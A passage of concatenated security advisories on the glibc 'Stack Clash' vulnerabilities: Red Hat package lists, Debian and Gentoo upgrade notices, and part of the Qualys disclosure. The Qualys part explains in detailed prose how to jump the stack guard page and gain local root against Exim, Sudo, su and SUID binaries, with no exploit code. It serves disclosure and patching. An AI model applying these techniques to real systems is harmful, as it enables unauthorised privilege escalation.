x86_64: glibc-debuginfo-2.12-1.107.el6_4.10.i686.rpm glibc-debuginfo-2.12-1.107.el6_4.10.x86_64.rpm glibc-debuginfo-common-2.12-1.107.el6_4.10.i686.rpm glibc-debuginfo-common-2.12-1.107.el6_4.10.x86_64.rpm glibc-static-2.12-1.107.el6_4.10.i686.rpm glibc-static-2.12-1.107.el6_4.10.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.5):
Source: glibc-2.12-1.132.el6_5.9.src.rpm
x86_64: glibc-debuginfo-2.12-1.132.el6_5.9.i686.rpm glibc-debuginfo-2.12-1.132.el6_5.9.x86_64.rpm glibc-debuginfo-common-2.12-1.132.el6_5.9.i686.rpm glibc-debuginfo-common-2.12-1.132.el6_5.9.x86_64.rpm glibc-static-2.12-1.132.el6_5.9.i686.rpm glibc-static-2.12-1.132.el6_5.9.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 6.5):
Source: glibc-2.12-1.132.el6_5.9.src.rpm
x86_64: glibc-debuginfo-2.12-1.132.el6_5.9.i686.rpm glibc-debuginfo-2.12-1.132.el6_5.9.x86_64.rpm glibc-debuginfo-common-2.12-1.132.el6_5.9.i686.rpm glibc-debuginfo-common-2.12-1.132.el6_5.9.x86_64.rpm glibc-static-2.12-1.132.el6_5.9.i686.rpm glibc-static-2.12-1.132.el6_5.9.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.6):
x86_64: glibc-debuginfo-2.12-1.149.el6_6.12.i686.rpm glibc-debuginfo-2.12-1.149.el6_6.12.x86_64.rpm glibc-debuginfo-common-2.12-1.149.el6_6.12.i686.rpm glibc-debuginfo-common-2.12-1.149.el6_6.12.x86_64.rpm glibc-static-2.12-1.149.el6_6.12.i686.rpm glibc-static-2.12-1.149.el6_6.12.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 6.6):
x86_64: glibc-debuginfo-2.12-1.149.el6_6.12.i686.rpm glibc-debuginfo-2.12-1.149.el6_6.12.x86_64.rpm glibc-debuginfo-common-2.12-1.149.el6_6.12.i686.rpm glibc-debuginfo-common-2.12-1.149.el6_6.12.x86_64.rpm glibc-static-2.12-1.149.el6_6.12.i686.rpm glibc-static-2.12-1.149.el6_6.12.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.7):
i386: glibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm glibc-static-2.12-1.166.el6_7.8.i686.rpm
ppc64: glibc-debuginfo-2.12-1.166.el6_7.8.ppc.rpm glibc-debuginfo-2.12-1.166.el6_7.8.ppc64.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.ppc.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.ppc64.rpm glibc-static-2.12-1.166.el6_7.8.ppc.rpm glibc-static-2.12-1.166.el6_7.8.ppc64.rpm
s390x: glibc-debuginfo-2.12-1.166.el6_7.8.s390.rpm glibc-debuginfo-2.12-1.166.el6_7.8.s390x.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.s390.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.s390x.rpm glibc-static-2.12-1.166.el6_7.8.s390.rpm glibc-static-2.12-1.166.el6_7.8.s390x.rpm
x86_64: glibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-2.12-1.166.el6_7.8.x86_64.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.x86_64.rpm glibc-static-2.12-1.166.el6_7.8.i686.rpm glibc-static-2.12-1.166.el6_7.8.x86_64.rpm
Red Hat Enterprise Linux ComputeNode EUS (v. 7.2):
Source: glibc-2.17-106.el7_2.9.src.rpm
x86_64: glibc-2.17-106.el7_2.9.i686.rpm glibc-2.17-106.el7_2.9.x86_64.rpm glibc-common-2.17-106.el7_2.9.x86_64.rpm glibc-debuginfo-2.17-106.el7_2.9.i686.rpm glibc-debuginfo-2.17-106.el7_2.9.x86_64.rpm glibc-debuginfo-common-2.17-106.el7_2.9.i686.rpm glibc-debuginfo-common-2.17-106.el7_2.9.x86_64.rpm glibc-devel-2.17-106.el7_2.9.i686.rpm glibc-devel-2.17-106.el7_2.9.x86_64.rpm glibc-headers-2.17-106.el7_2.9.x86_64.rpm glibc-utils-2.17-106.el7_2.9.x86_64.rpm nscd-2.17-106.el7_2.9.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.2):
x86_64: glibc-debuginfo-2.17-106.el7_2.9.i686.rpm glibc-debuginfo-2.17-106.el7_2.9.x86_64.rpm glibc-debuginfo-common-2.17-106.el7_2.9.i686.rpm glibc-debuginfo-common-2.17-106.el7_2.9.x86_64.rpm glibc-static-2.17-106.el7_2.9.i686.rpm glibc-static-2.17-106.el7_2.9.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 7.2):
Source: glibc-2.17-106.el7_2.9.src.rpm
ppc64: glibc-2.17-106.el7_2.9.ppc.rpm glibc-2.17-106.el7_2.9.ppc64.rpm glibc-common-2.17-106.el7_2.9.ppc64.rpm glibc-debuginfo-2.17-106.el7_2.9.ppc.rpm glibc-debuginfo-2.17-106.el7_2.9.ppc64.rpm glibc-debuginfo-common-2.17-106.el7_2.9.ppc.rpm glibc-debuginfo-common-2.17-106.el7_2.9.ppc64.rpm glibc-devel-2.17-106.el7_2.9.ppc.rpm glibc-devel-2.17-106.el7_2.9.ppc64.rpm glibc-headers-2.17-106.el7_2.9.ppc64.rpm glibc-utils-2.17-106.el7_2.9.ppc64.rpm nscd-2.17-106.el7_2.9.ppc64.rpm
ppc64le: glibc-2.17-106.el7_2.9.ppc64le.rpm glibc-common-2.17-106.el7_2.9.ppc64le.rpm glibc-debuginfo-2.17-106.el7_2.9.ppc64le.rpm glibc-debuginfo-common-2.17-106.el7_2.9.ppc64le.rpm glibc-devel-2.17-106.el7_2.9.ppc64le.rpm glibc-headers-2.17-106.el7_2.9.ppc64le.rpm glibc-utils-2.17-106.el7_2.9.ppc64le.rpm nscd-2.17-106.el7_2.9.ppc64le.rpm
s390x: glibc-2.17-106.el7_2.9.s390.rpm glibc-2.17-106.el7_2.9.s390x.rpm glibc-common-2.17-106.el7_2.9.s390x.rpm glibc-debuginfo-2.17-106.el7_2.9.s390.rpm glibc-debuginfo-2.17-106.el7_2.9.s390x.rpm glibc-debuginfo-common-2.17-106.el7_2.9.s390.rpm glibc-debuginfo-common-2.17-106.el7_2.9.s390x.rpm glibc-devel-2.17-106.el7_2.9.s390.rpm glibc-devel-2.17-106.el7_2.9.s390x.rpm glibc-headers-2.17-106.el7_2.9.s390x.rpm glibc-utils-2.17-106.el7_2.9.s390x.rpm nscd-2.17-106.el7_2.9.s390x.rpm
x86_64: glibc-2.17-106.el7_2.9.i686.rpm glibc-2.17-106.el7_2.9.x86_64.rpm glibc-common-2.17-106.el7_2.9.x86_64.rpm glibc-debuginfo-2.17-106.el7_2.9.i686.rpm glibc-debuginfo-2.17-106.el7_2.9.x86_64.rpm glibc-debuginfo-common-2.17-106.el7_2.9.i686.rpm glibc-debuginfo-common-2.17-106.el7_2.9.x86_64.rpm glibc-devel-2.17-106.el7_2.9.i686.rpm glibc-devel-2.17-106.el7_2.9.x86_64.rpm glibc-headers-2.17-106.el7_2.9.x86_64.rpm glibc-utils-2.17-106.el7_2.9.x86_64.rpm nscd-2.17-106.el7_2.9.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 7.2):
ppc64: glibc-debuginfo-2.17-106.el7_2.9.ppc.rpm glibc-debuginfo-2.17-106.el7_2.9.ppc64.rpm glibc-debuginfo-common-2.17-106.el7_2.9.ppc.rpm glibc-debuginfo-common-2.17-106.el7_2.9.ppc64.rpm glibc-static-2.17-106.el7_2.9.ppc.rpm glibc-static-2.17-106.el7_2.9.ppc64.rpm
ppc64le: glibc-debuginfo-2.17-106.el7_2.9.ppc64le.rpm glibc-debuginfo-common-2.17-106.el7_2.9.ppc64le.rpm glibc-static-2.17-106.el7_2.9.ppc64le.rpm
s390x: glibc-debuginfo-2.17-106.el7_2.9.s390.rpm glibc-debuginfo-2.17-106.el7_2.9.s390x.rpm glibc-debuginfo-common-2.17-106.el7_2.9.s390.rpm glibc-debuginfo-common-2.17-106.el7_2.9.s390x.rpm glibc-static-2.17-106.el7_2.9.s390.rpm glibc-static-2.17-106.el7_2.9.s390x.rpm
x86_64: glibc-debuginfo-2.17-106.el7_2.9.i686.rpm glibc-debuginfo-2.17-106.el7_2.9.x86_64.rpm glibc-debuginfo-common-2.17-106.el7_2.9.i686.rpm glibc-debuginfo-common-2.17-106.el7_2.9.x86_64.rpm glibc-static-2.17-106.el7_2.9.i686.rpm glibc-static-2.17-106.el7_2.9.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2017-1000366 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/stackguard
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFZSDV3XlSAg2UNWIIRAibeAKC2QtxViqngTTBVM9fvG1XjRCkgwACgrHP1 PVr1sUH9RUhxrQOKQqWtnKY= =ywUB -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . For the full details, please refer to their advisory published at: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
For the oldstable distribution (jessie), this problem has been fixed in version 2.19-18+deb8u10.
For the stable distribution (stretch), this problem has been fixed in version 2.24-11+deb9u1.
For the unstable distribution (sid), this problem will be fixed soon.
We recommend that you upgrade your glibc packages.
Gentoo Linux Security Advisory GLSA 201706-19
https://security.gentoo.org/
Severity: High Title: GNU C Library: Multiple vulnerabilities Date: June 20, 2017 Bugs: #608698, #608706, #622220 ID: 201706-19
Synopsis
Multiple vulnerabilities have been found in the GNU C Library, the worst of which may allow execution of arbitrary code.
Background
The GNU C library is the standard C library used by Gentoo Linux systems.
Workaround
There is no known workaround at this time.
Resolution
All GNU C Library users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=sys-libs/glibc-2.23-r4"
References
[ 1 ] CVE-2015-5180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5180 [ 2 ] CVE-2016-6323 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6323 [ 3 ] CVE-2017-1000366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-1000366 [ 4 ] Qualys Security Advisory - The Stack Clash https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-19
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--cxbO5eT2swQBqr8k9tc6wcfapgLAJb4xR--
. Qualys Security Advisory
The Stack Clash
======================================================================== Contents ========================================================================
I. Introduction II. Problem II.1. Automatic stack expansion II.2. Stack guard-page II.3. Stack-clash exploitation III. Solutions IV. Results IV.1. Linux IV.2. OpenBSD IV.3. NetBSD IV.4. FreeBSD IV.5. Solaris V. Acknowledgments
======================================================================== I. Introduction ========================================================================
Our research started with a 96-megabyte surprise:
b97bb000-b97dc000 rw-p 00000000 00:00 0 [heap] bf7c6000-bf806000 rw-p 00000000 00:00 0 [stack]
and a 12-year-old question: "If the heap grows up, and the stack grows down, what happens when they clash? Is it exploitable? How?"
- In 2005, Gael Delalleau presented "Large memory management vulnerabilities" and the first stack-clash exploit in user-space (against mod_php 4.3.0 on Apache 2.0.53):
http://cansecwest.com/core05/memory_vulns_delalleau.pdf
- In 2010, Rafal Wojtczuk published "Exploiting large memory management vulnerabilities in Xorg server running on Linux", the second stack-clash exploit in user-space (CVE-2010-2240):
http://www.invisiblethingslab.com/resources/misc-2010/xorg-large-memory-attacks.pdf
- Since 2010, security researchers have exploited several stack-clashes in the kernel-space; for example:
https://jon.oberheide.org/blog/2010/11/29/exploiting-stack-overflows-in-the-linux-kernel/ https://jon.oberheide.org/files/infiltrate12-thestackisback.pdf https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html
In user-space, however, this problem has been greatly underestimated; the only public exploits are Gael Delalleau's and Rafal Wojtczuk's, and they were written before Linux introduced a protection against stack-clashes (a "guard-page" mapped below the stack):
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2240
In this advisory, we show that stack-clashes are widespread in user-space, and exploitable despite the stack guard-page; we discovered multiple vulnerabilities in guard-page implementations, and devised general methods for:
-
"Clashing" the stack with another memory region: we allocate memory until the stack reaches another memory region, or until another memory region reaches the stack;
-
"Jumping" over the stack guard-page: we move the stack-pointer from the stack and into the other memory region, without accessing the stack guard-page;
-
"Smashing" the stack, or the other memory region: we overwrite the stack with the other memory region, or the other memory region with the stack.
To illustrate our findings, we developed the following exploits and proofs-of-concepts:
-
a local-root exploit against Exim (CVE-2017-1000369, CVE-2017-1000376) on i386 Debian;
-
a local-root exploit against Sudo (CVE-2017-1000367, CVE-2017-1000366) on i386 Debian, Ubuntu, CentOS;
-
an independent Sudoer-to-root exploit against CVE-2017-1000367 on any SELinux-enabled distribution;
-
a local-root exploit against ld.so and most SUID-root binaries (CVE-2017-1000366, CVE-2017-1000370) on i386 Debian, Fedora, CentOS;
-
a local-root exploit against ld.so and most SUID-root PIEs (CVE-2017-1000366, CVE-2017-1000371) on i386 Debian, Ubuntu, Fedora;
-
a local-root exploit against /bin/su (CVE-2017-1000366, CVE-2017-1000365) on i386 Debian;
-
a proof-of-concept that gains eip control against Sudo on i386 grsecurity/PaX (CVE-2017-1000367, CVE-2017-1000366, CVE-2017-1000377);
-
a local proof-of-concept that gains rip control against Exim (CVE-2017-1000369) on amd64 Debian;
-
a local-root exploit against ld.so and most SUID-root binaries (CVE-2017-1000366, CVE-2017-1000379) on amd64 Debian, Ubuntu, Fedora, CentOS;
-
a proof-of-concept against /usr/bin/at on i386 OpenBSD, for CVE-2017-1000372 in OpenBSD's stack guard-page implementation and CVE-2017-1000373 in OpenBSD's qsort() function;
-
a proof-of-concept for CVE-2017-1000374 and CVE-2017-1000375 in NetBSD's stack guard-page implementation;
-
a proof-of-concept for CVE-2017-1085 in FreeBSD's setrlimit() RLIMIT_STACK implementation;
-
two proofs-of-concept for CVE-2017-1083 and CVE-2017-1084 in FreeBSD's stack guard-page implementation;
-
a local-root exploit against /usr/bin/rsh (CVE-2017-3630, CVE-2017-3629, CVE-2017-3631) on Solaris 11.
======================================================================== II. Problem ========================================================================
Note: in this advisory, the "start of the stack" is the lowest address of its memory region, and the "end of the stack" is the highest address of its memory region; we do not use the ambiguous terms "top of the stack" and "bottom of the stack".
======================================================================== II.1. Automatic stack expansion ========================================================================
The user-space stack of a process is automatically expanded by the kernel:
-
if the stack-pointer (the esp register, on i386) reaches the start of the stack and the unmapped memory pages below (the stack grows down, on i386),
-
then a "page-fault" exception is raised and caught by the kernel,
-
and the page-fault handler transparently expands the user-space stack of the process (it decreases the start address of the stack),
-
or it terminates the process with a SIGSEGV if the stack expansion fails (for example, if the RLIMIT_STACK is reached).
Unfortunately, this stack expansion mechanism is implicit and fragile: it relies on page-fault exceptions, but if another memory region is mapped directly below the stack, then the stack-pointer can move from the stack into the other memory region without raising a page-fault, and:
-
the kernel cannot tell that the process needed more stack memory;
-
the process cannot tell that its stack-pointer moved from the stack into another memory region.
In contrast, the heap expansion mechanism is explicit and robust: the process uses the brk() system-call to tell the kernel that it needs more heap memory, and the kernel expands the heap accordingly (it increases the end address of the heap memory region -- the heap always grows up).
======================================================================== II.2. Stack guard-page ========================================================================
The fragile stack expansion mechanism poses a security threat: if the stack-pointer of a process can move from the stack into another memory region (which ends exactly where the stack starts) without raising a page-fault, then:
-
the process uses this other memory region as if it were an extension of the stack;
-
a write to this stack extension smashes the other memory region;
-
a write to the other memory region smashes the stack extension.
To protect against this security threat, the kernel maps a "guard-page" below the start of the stack: one or more PROT_NONE pages (or unmappable pages) that:
-
raise a page-fault exception if accessed (before the stack-pointer can move from the stack into another memory region);
-
terminate the process with a SIGSEGV (because the page-fault handler cannot expand the stack if another memory region is mapped directly below).
Unfortunately, a stack guard-page of a few kilobytes is insufficient (CVE-2017-1000364): if the stack-pointer "jumps" over the guard-page -- if it moves from the stack into another memory region without accessing the guard-page -- then no page-fault exception is raised and the stack extends into the other memory region.
This theoretical vulnerability was first described in Gael Delalleau's 2005 presentation (slides 24-29). In the present advisory, we discuss its practicalities, and multiple vulnerabilities in stack guard-page implementations (in OpenBSD, NetBSD, and FreeBSD), but we exclude related vulnerabilities such as unbounded alloca()s and VLAs (Variable-Length Arrays) that have been exploited in the past:
http://phrack.org/issues/63/14.html http://blog.exodusintel.com/2013/01/07/who-was-phone/
======================================================================== II.3. Stack-clash exploitation ========================================================================
Must be a clash, there's no alternative.
--The Clash, "Kingston Advice"
Our exploits follow a series of four sequential steps -- each step allocates memory that must not be freed before all steps are complete:
Step 1: Clash (the stack with another memory region) Step 2: Run (move the stack-pointer to the start of the stack) Step 3: Jump (over the stack guard-page, into the other memory region) Step 4: Smash (the stack, or the other memory region)
======================================================================== II.3.1. Step 1: Clash the stack with another memory region ========================================================================
Have the boys found the leak yet?
--The Clash, "The Leader"
Allocate memory until the start of the stack reaches the end of another memory region, or until the end of another memory region reaches the start of the stack.
-
The other memory region can be, for example: . the heap; . an anonymous mmap(); . the read-write segment of ld.so; . the read-write segment of a PIE, a Position-Independent Executable.
-
The memory allocated in this Step 1 can be, for example: . stack and heap memory; . stack and anonymous mmap() memory; . stack memory only.
-
The heap and anonymous mmap() memory can be:
. temporarily allocated, but not freed before the stack guard-page is jumped over in Step 3 and memory is smashed in Step 4;
. permanently leaked. On Linux, a general method for allocating anonymous mmap()s is the LD_AUDIT memory leak that we discovered in the ld.so part of the glibc, the GNU C Library (CVE-2017-1000366).
- The stack memory can be allocated, for example:
. through megabytes of command-line arguments and environment variables.
On Linux, this general method for allocating stack memory is limited
by the kernel to 1/4 of the current RLIMIT_STACK (1GB on i386 if
RLIMIT_STACK is RLIM_INFINITY -- man execve, "Limits on size of
arguments and environment").
However, as we were drafting this advisory, we realized that the
kernel imposes this limit on the argument and environment strings,
but not on the argv[] and envp[] pointers to these strings, and we
developed alternative versions of our Linux exploits that do not
depend on application-specific memory leaks (CVE-2017-1000365). through recursive function calls.
On BSD, we discovered a general method for allocating megabytes of
stack memory: a vulnerability in qsort() that causes this function
to recurse N/4 times, given a pathological input array of N elements
(CVE-2017-1000373 in OpenBSD, CVE-2017-1000378 in NetBSD, and
CVE-2017-1082 in FreeBSD).
- In a few rare cases, Step 1 is not needed, because another memory region is naturally mapped directly below the stack (for example, ld.so in our Solaris exploit).
======================================================================== II.3.2. Step 2: Move the stack-pointer to the start of the stack ========================================================================
Run, run, run, run, run, don't you know?
--The Clash, "Three Card Trick"
Consume the unused stack memory that separates the stack-pointer from the start of the stack. This Step 2 is similar to Step 3 ("Jump over the stack guard-page") but is needed because:
- the stack-pointer is usually several kilobytes higher than the start of the stack (functions that allocate a large stack-frame decrease the start address of the stack, but this address is never increased again); moreover:
. the FreeBSD kernel automatically expands the user-space stack of a process by multiples of 128KB (SGROWSIZ, in vm_map_growstack());
. the Linux kernel initially expands the user-space stack of a process by 128KB (stack_expand, in setup_arg_pages()).
- in Step 3, the stack-based buffer used to jump over the guard-page:
. is usually not large enough to simultaneously move the stack-pointer to the start of the stack, and then into another memory region;
. must not be fully written to (a full write would access the stack guard-page and terminate the process) but the stack memory consumed in this Step 2 can be fully written to (for example, strdupa() can be used in Step 2, but not in Step 3).
The stack memory consumed in this Step 2 can be, for example:
-
large stack-frames, alloca()s, or VLAs (which can be detected by grsecurity/PaX's STACKLEAK plugin for GCC, https://grsecurity.net/features.php);
-
recursive function calls (which can be detected by GNU cflow, http://www.gnu.org/software/cflow/);
-
on Linux, we discovered that the argv[] and envp[] arrays of pointers can be used to consume the 128KB of initial stack expansion, because the kernel allocates these arrays on the stack long after the call to setup_arg_pages(); this general method for completing Step 2 is exploitable locally, but the initial stack expansion poses a major obstacle to the remote exploitation of stack-clashes, as mentioned in IV.1.1.
In a few rare cases, Step 2 is not needed, because the stack-pointer is naturally close to the start of the stack (for example, in Exim's main() function, the 256KB group_list[] moves the stack-pointer to the start of the stack and beyond).
======================================================================== II.3.3. Step 3: Jump over the stack guard-page, into another memory region ========================================================================
You need a little jump of electrical shockers.
--The Clash, "Clash City Rockers"
Move the stack-pointer from the stack and into the memory region that clashed with the stack in Step 1, but without accessing the guard-page. To complete this Step 3, a large stack-based buffer, alloca(), or VLA is needed, and:
-
it must be larger than the guard-page;
-
it must end in the stack, above the guard-page;
-
it must start in the memory region below the stack guard-page;
-
it must not be fully written to (a full write would access the guard-page, raise a page-fault exception, and terminate the process, because the memory region mapped directly below the stack prevents the page-fault handler from expanding the stack).
In a few cases, Step 3 is not needed:
-
on FreeBSD, a stack guard-page is implemented but disabled by default (CVE-2017-1083);
-
on OpenBSD, NetBSD, and FreeBSD, we discovered implementation vulnerabilities that eliminate the stack guard-page (CVE-2017-1000372, CVE-2017-1000374, CVE-2017-1084).
On Linux, we devised general methods for jumping over the stack guard-page (CVE-2017-1000366):
- The glibc's __dcigettext() function alloca()tes single_locale, a stack-based buffer of up to 128KB (MAX_ARG_STRLEN, man execve), the length of the LANGUAGE environment variable (if the current locale is neither "C" nor "POSIX", but distributions install default locales such as "C.UTF-8" and "en_US.utf8").
If LANGUAGE is mostly composed of ':' characters, then single_locale is barely written to, and can be used to jump over the stack guard-page.
Moreover, if __dcigettext() finds the message to be translated, then _nl_find_msg() strdup()licates the OUTPUT_CHARSET environment variable and allows a local attacker to immediately smash the stack and gain control of the instruction pointer (the eip register, on i386), as detailed in Step 4a.
We exploited this stack-clash against Sudo and su, but most of the SUID (set-user-ID) and SGID (set-group-ID) binaries that call setlocale(LC_ALL, "") and __dcigettext() or its derivatives (the *gettext() functions, the _() convenience macro, the strerror() function) are exploitable.
- The glibc's vfprintf() function (called by the *printf() family of functions) alloca()tes a stack-based work buffer of up to 64KB (__MAX_ALLOCA_CUTOFF) if a width or precision is greater than 1KB (WORK_BUFFER_SIZE).
If the corresponding format specifier is %s then this work buffer is never written to and can be used to jump over the stack guard-page.
None of our exploits is based on this method, but it was one of our ideas to exploit Exim remotely, as mentioned in IV.1.1.
- The glibc's getaddrinfo() function calls gaih_inet(), which alloca()tes tmpbuf, a stack-based buffer of up to 64KB (__MAX_ALLOCA_CUTOFF) that may be used to jump over the stack guard-page.
Moreover, gaih_inet() calls the gethostbyname*() functions, which malloc()ate a heap-based DNS response of up to 64KB (MAXPACKET) that may allow a remote attacker to immediately smash the stack, as detailed in Step 4a.
None of our exploits is based on this method, but it may be the key to the remote exploitation of stack-clashes.
- The glibc's run-time dynamic linker ld.so alloca()tes llp_tmp, a stack-based copy of the LD_LIBRARY_PATH environment variable. If LD_LIBRARY_PATH contains Dynamic String Tokens (DSTs), they are first expanded: llp_tmp can be larger than 128KB (MAX_ARG_STRLEN) and not fully written to, and can therefore be used to jump over the stack guard-page and smash the memory region mapped directly below, as detailed in Step 4b.
We exploited this ld.so stack-clash in two data-only attacks that bypass NX (No-eXecute) and ASLR (Address Space Layout Randomization) and obtain a privileged shell through most SUID and SGID binaries on most i386 Linux distributions.
- Several local and remote applications allocate a 256KB stack-based "gid_t buffer[NGROUPS_MAX];" that is not fully written to and can be used to move the stack-pointer to the start of the stack (Step 2) and jump over the guard-page (Step 3). For example, Exim's main() function and older versions of util-linux's su.
None of our exploits is based on this method, but an experimental version of our Exim exploit unexpectedly gained control of eip after the group_list[] buffer had jumped over the stack guard-page.
======================================================================== II.3.4. Step 4: Either smash the stack with another memory region (Step 4a) or smash another memory region with the stack (Step 4b) ========================================================================
Smash and grab, it's that kind of world.
--The Clash, "One Emotion"
In Step 3, a function allocates a large stack-based buffer and jumps over the stack guard-page into the memory region mapped directly below; in Step 4, before this function returns and jumps back into the stack:
- Step 4a: a write to the memory region mapped below the stack (where esp still points to) effectively smashes the stack. We exploit this general method for completing Step 4 in Exim, Sudo, and su:
. we overwrite a return-address on the stack and gain control of eip;
. we return-into-libc (into system() or __libc_dlopen()) to defeat NX;
. we brute-force ASLR (8 bits of entropy) if CVE-2016-3672 is patched;
. we bypass SSP (Stack-Smashing Protector) because we overwrite the return-address of a function that is not protected by a stack canary (the memcpy() that smashes the stack usually overwrites its own stack-frame and return-address).
- Step 4b: a write to the stack effectively smashes the memory region mapped below (where esp still points to). This second method for completing Step 4 is application-specific (it depends on the contents of the memory region that we smash) unless we exploit the run-time dynamic linker ld.so:
. on Solaris, we devised a general method for smashing ld.so's read-write segment, overwriting one of its function pointers, and executing our own shell-code;
. on Linux, we exploited most SUID and SGID binaries through ld.so: our "hwcap" exploit smashes an mmap()ed string, and our ".dynamic" exploit smashes a PIE's read-write segment before it is mprotect()ed read-only by Full RELRO (Full RELocate Read-Only -- GNU_RELRO and BIND_NOW).
======================================================================== III. Solutions ========================================================================
Based on our research, we recommend that the affected operating systems:
- Increase the size of the stack guard-page to at least 1MB, and allow system administrators to easily modify this value (for example, grsecurity/PaX introduced /proc/sys/vm/heap_stack_gap in 2010).
This first, short-term solution is cheap, but it can be defeated by a very large stack-based buffer.
- Recompile all userland code (ld.so, libraries, binaries) with GCC's "-fstack-check" option, which prevents the stack-pointer from moving into another memory region without accessing the stack guard-page (it writes one word to every 4KB page allocated on the stack).
This second, long-term solution is expensive, but it cannot be defeated (even if the stack guard-page is only 4KB, one page) -- unless a vulnerability is discovered in the implementation of the stack guard-page or the "-fstack-check" option.
======================================================================== IV. Results ========================================================================
======================================================================== IV.1. Linux ========================================================================
======================================================================== IV.1.1. Exim ========================================================================
Debian 8.5
Crude exploitation
Our first exploit, a Local Privilege Escalation against Exim's SUID-root PIE (Position-Independent Executable) on i386 Debian 8.5, simply follows the four sequential steps outlined in II.3.
Step 1: Clash the stack with the heap
To reach the start of the stack with the end of the heap (man brk), we permanently leak memory through multiple -p command-line arguments that are malloc()ated by Exim but never free()d (CVE-2017-1000369) -- we call such a malloc()ated chunk of heap memory a "memleak-chunk".
Because the -p argument strings are originally allocated on the stack by execve(), we must cover half of the initial heap-stack distance (between the start of the heap and the end of the stack) with stack memory, and half of this distance with heap memory.
If we set the RLIMIT_STACK to 136MB (MIN_GAP, arch/x86/mm/mmap.c) then the initial heap-stack distance is minimal (randomized in a [96MB,137MB] range), but we cannot reach the stack with the heap because of the 1/4 limit imposed by the kernel on the argument and environment strings (man execve): 136MB/4=34MB of -p argument strings cannot cover 96MB/2=48MB, half of the minimum heap-stack distance.
Moreover, if we increase the RLIMIT_STACK, the initial heap-stack distance also increases and we still cannot reach the stack with the heap. However, if we set the RLIMIT_STACK to RLIM_INFINITY (4GB on i386) then the kernel switches from the default top-down mmap() layout to a legacy bottom-up mmap() layout, and:
-
the initial heap-stack distance is approximately 2GB, because the start of the heap (the initial brk()) is randomized above the address 0x40000000, and the end of the stack is randomized below the address 0xC0000000;
-
we can reach the stack with the heap, despite the 1/4 limit imposed by the kernel on the argument and environment strings, because 4GB/4=1GB of -p argument strings can cover 2GB/2=1GB, half of the initial heap-stack distance;
-
we clash the stack with the heap around the address 0x80000000.
Step 2: Move the stack-pointer (esp) to the start of the stack
The 256KB stack-based group_list[] in Exim's main() naturally consumes the 128KB of initial stack expansion, as mentioned in II.3.2.
Step 3: Jump over the stack guard-page and into the heap
To move esp from the start of the stack into the heap, without accessing the stack guard-page, we use a malformed -d command-line argument that is written to the 32KB (STRING_SPRINTF_BUFFER_SIZE) stack-based buffer in Exim's string_sprintf() function. This buffer is not fully written to and hence does not access the stack guard-page, because our -d argument string is much shorter than 32KB.
Step 4a: Smash the stack with the heap
Before string_sprintf() returns (and moves esp from the heap back into the stack) it calls string_copy(), which malloc()ates and memcpy()es our -d argument string to the end of the heap, where esp still points to -- we call this malloc()ated chunk of heap memory the "smashing-chunk".
This call to memcpy() therefore smashes its own stack-frame (which is not protected by SSP) with the contents of our smashing-chunk, and we overwrite memcpy()'s return-address with the address of libc's system() function (which is not randomized by ASLR because Debian 8.5 is vulnerable to CVE-2016-3672):
-
instead of smashing memcpy()'s stack-frame with an 8-byte pattern (the return-address to system() and its argument) we smash it with a simple 4-byte pattern (the return-address to system()), append "." to the PATH environment variable, and symlink() our exploit to the string that begins at the address of libc's system() function;
-
system() does not drop our escalated root privileges, because Debian's /bin/sh is dash, not bash and its -p option (man bash).
This first version of our Exim exploit obtained a root-shell after nearly a week of failed attempts; to improve this result, we analyzed every step of a successful run.
Refined exploitation
Step 1: Clash the stack with the heap
- The heap must be able to reach the stack [Condition 1]
The start of the heap is randomized in the 32MB range above the end of Exim's PIE (the end of its .bss section), but the growth of the heap is sometimes blocked by libraries that are mmap()ed within the same range (because of the legacy bottom-up mmap() layout). On Debian 8.5, Exim's libraries occupy about 8MB and thus block the growth of the heap with a probability of 8MB/32MB = 1/4.
